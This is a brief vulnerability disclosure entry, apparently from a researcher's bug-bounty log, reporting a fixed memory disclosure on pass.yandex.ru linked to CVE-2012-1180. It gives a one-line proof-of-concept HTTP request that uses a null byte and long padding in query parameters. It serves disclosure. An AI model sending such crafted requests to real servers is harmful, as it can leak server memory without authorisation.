BC #30 - [Fixed] memory disclosure on pass.yandex.ru

Description: Memory disclosure with specially crafted backend responses (CVE-2012-1180)

PoC:
GET /?retpath=http://clubs.ya.ru&clean=yes%00AAAAAAAA.....AAAAAAAAAAAAAAAAA HTTP/1.1
Host: pass.yandex.ru

Found: 2012-12-24
Exploit: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1180
Video: N/A

Created at 01 Oct'2013 04:07:45 | BlackFan | 1835
